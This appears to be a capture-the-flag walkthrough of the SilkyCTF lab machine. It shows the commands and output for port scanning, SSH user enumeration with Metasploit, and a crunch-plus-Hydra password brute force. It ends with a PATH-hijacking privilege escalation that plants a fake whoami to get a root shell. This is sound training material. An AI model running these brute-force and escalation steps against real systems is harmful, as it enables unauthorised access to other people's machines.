SilkyCTF is a boot2root intermediate machine.
IP:192.168.0.109
Lets start by scanning all the ports
-> nmap -A -T4 -p- 192.168.0.109

Nmap scan report for 192.168.0.109
Host is up (0.0032s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 49:e6:fa:4c:d5:60:06:3b:c0:a8:c9:cc:00:10:7e:04 (RSA)
|   256 29:1b:39:69:32:aa:ae:9f:72:83:29:d4:27:db:f8:af (ECDSA)
|_  256 a0:05:9e:82:bc:9d:09:ce:8e:c5:40:b2:b2:93:c6:53 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/notes.txt
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/21%OT=22%CT=1%CU=35114%PV=Y%DS=2%DC=T%G=Y%TM=5F68C3D
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=8)OPS
OS:(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST1
OS:1NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=A7BF%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)


Found robots.txt 

User-agent: UniversalRobot/1.0
User-agent: mein-Robot

User-agent: *
Disallow: /notes.txt


Found this text under notes.txt
Ich muss unbedingt das Passwort aus der Seite entfernen, immerhin fehlen die letzten 2 Zeichen. Aber trotzdem.

I googled it and got to know that its german

I have to remove the password from the page, at least the last 2 characters are missing. But still.

//  s1lKy 
Got this in script.js maybe this is the password that he/she is talking about.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set username silky
username => silky
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.0.109
rhosts => 192.168.0.109
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.0.109:22 - SSH - Using malformed packet technique
[*] 192.168.0.109:22 - SSH - Starting scan
[+] 192.168.0.109:22 - SSH - User 'silky' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > 

so silky is the username and s1lKy** might be the password

So we can replace the last two digits with numbers or with letters.

-t @,%^
              Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s, and ^'s will change.
              @ will insert lower case characters
              , will insert upper case characters
              % will insert numbers
              ^ will insert symbols

This is the man page of crunch so we can use this.
crunch 7 7 -t s1lky^% -o wordlist.txt

root@LAPTOP-U5913CMD:/home/akshay/Desktop/SilkTF# hydra -l silky -P wordlist.txt ssh://192.168.0.109
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-21 21:35:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 330 login tries (l:1/p:330), ~21 tries per task
[DATA] attacking ssh://192.168.0.109:22/
[22][ssh] host: 192.168.0.109   login: silky   password: s1lKy#5
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-21 21:35:49
root@LAPTOP-U5913CMD:/home/akshay/Desktop/SilkTF# 


Ok nice so found ssh password

username:silky
password:s1lky#5


root@LAPTOP-U5913CMD:/home/akshay/Desktop/SilkTF# ssh silky@192.168.0.109
The authenticity of host '192.168.0.109 (192.168.0.109)' can't be established.
ECDSA key fingerprint is SHA256:2epmMtO8pFa5KBpiJIOehEkwaNji3bhOSnRt4dUG5Xw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.109' (ECDSA) to the list of known hosts.
silky@192.168.0.109's password: 
Linux Silky-CTF 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 14 04:04:41 2019 from 192.168.178.22
silky@Silky-CTF:~$ id
uid=1000(silky) gid=1000(silky) Gruppen=1000(silky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner)
silky@Silky-CTF:~$ 

[]A\A]A^A_
echo 'Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. 
gezeichnet:';   whoami

I dont understand lets translate this.

Silk is an animal fiber. It is obtained from the cocoons of the silkworm, the larva of the silk moth.
drawn:

Maybe we can write some malicious into whoami.
We can use PATH variable to exploit this into root.


silky@Silky-CTF:/tmp$ echo "/bin/sh" > whoami
silky@Silky-CTF:/tmp$ export PATH=/tmp:$PATH
silky@Silky-CTF:/tmp$ chmod 777 whoami
silky@Silky-CTF:/tmp$ cd /usr/bin
silky@Silky-CTF:/usr/bin$ ./sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. 
gezeichnet:
# id
uid=1000(silky) gid=1000(silky) euid=0(root) Gruppen=1000(silky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner)
#

# cd /root
# ls
flag.txt
# cat flag.txt
███████╗██╗██╗     ██╗  ██╗██╗   ██╗      ██████╗████████╗███████╗
██╔════╝██║██║     ██║ ██╔╝╚██╗ ██╔╝     ██╔════╝╚══██╔══╝██╔════╝
███████╗██║██║     █████╔╝  ╚████╔╝█████╗██║        ██║   █████╗  
╚════██║██║██║     ██╔═██╗   ╚██╔╝ ╚════╝██║        ██║   ██╔══╝  
███████║██║███████╗██║  ██╗   ██║        ╚██████╗   ██║   ██║     
╚══════╝╚═╝╚══════╝╚═╝  ╚═╝   ╚═╝         ╚═════╝   ╚═╝   ╚═╝     
                                                                  


flag: 489ca3ccb71640cce1a618a5dea48c25



Congrats ;)
# 

Thank you...Happy Hacking :)
